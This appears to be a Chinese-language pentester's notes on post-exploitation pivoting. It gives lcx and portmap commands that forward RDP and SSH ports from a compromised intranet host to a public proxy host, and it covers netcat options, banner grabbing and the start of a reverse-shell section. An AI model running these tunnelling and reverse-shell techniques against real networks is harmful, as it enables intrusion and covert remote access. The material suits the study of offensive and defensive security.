1、lcx 使用
lcx 分为 Windows 版和 Linux 版,Linux 版叫 portmap
Windows
- 内网端口转发
内网失陷主机
lcx.exe -slave rhost rport lhost lport
公网代理主机
lcx.exe -listen lport1 lport2
内网失陷主机
lcx.exe -slave 123.123.123.123 4444 127.0.0.1 3389
公网代理主机
lcx.exe -listen 4444 5555
在建立连接后,访问公网代理主机的 5555 端口就能访问到内网失陷主机的 3389 端口了。
- 本地端口映射
如果目标主机不能出网,这时可以利用内网中能够出网的主机,将其不能出网的主机端口映射到自身上,再借助端口转发到公网进行访问。
lcx.exe -tran 53 <目标主机 IP 地址> 3389
Linux
- 内网端口转发
内网失陷主机
./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 <公网主机 IP> -p2 4444
公网代理主机
./portmap -m 2 -p1 4444 -h2 <公网主机 IP> -p2 5555
此时访问公网主机 IP 的 5555 端口,就会访问到内网失陷主机的 22 端口了。
2、netcat 使用
nc 下载地址:https://eternallybored.org/misc/netcat/
nc 全称 netcat,它的功能很多,这里简单记录下两个常用的功能,其他的比如文件传输、端口扫描等等的就不介绍了,毕竟平时使用频率有一说一还是比较少的。
-l 开启监听状态
-v 显示详细信息
-p 指定监听的本地端口
-k 客户端断掉连接时,服务端依然保持运行
-e 将传入的信息以命令执行
-n 直接使用 IP 地址,不进行 dns 解析过程
获取 banner 信息
个人觉着最常用的功能,这个不仅可以用来查看 banner 信息,还能用来判断端口是否开放。
nc -vv rhost rport
> nc -v 172.16.214.43 22
Connection to 172.16.214.43 port 22 [tcp/ssh] succeeded!
SSH-2.0-OpenSSH_8.4p1 Debian-3
反弹shell
个人觉着这个也是最常用的功能,可以使用 -e 指定 /bin/bash 进行反弹,也可以直接 -c 指定 bash 或者 cmd
-e 指定反弹 shell